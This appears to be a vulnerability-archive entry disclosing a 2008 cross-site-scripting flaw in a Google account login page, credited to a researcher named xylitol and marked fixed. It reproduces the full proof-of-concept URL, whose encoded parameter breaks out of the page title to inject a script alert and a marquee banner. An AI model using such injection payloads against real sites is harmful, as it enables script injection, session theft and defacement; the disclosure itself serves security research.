Security researcher xylitol, has submitted on 09/11/2008 a cross-site-scripting (XSS) vulnerability affecting www.google.com, which at the time of submission ranked 2 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 12/11/2008. It is currently fixed. |
Date submitted: 09/11/2008 |
Date published: 12/11/2008 |
Date fixed: 12/11/2008 | Status: FIXED |
Author: xylitol |
Domain: www.google.com |
Category: XSS |
Pagerank: 2 |
URL: https://www.google.com/accounts/ServiceLogin?service=websiteoptimizer&hl=e'%22%3E%3C/title%3E%3Cscri pt%3Ealert(1337)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20Xylitol%3C/h1%3E%3C/marquee%3En&cont inue=https%3A%2F%2Fwww.google.com%2Fanalytics%2Fsiteopt%2F%3Fet%3Dreset%26hl%3Den&utm_source=service s&utm_medium=redirect&utm_campaign=standalone |
Click here to view the mirror
|
|
|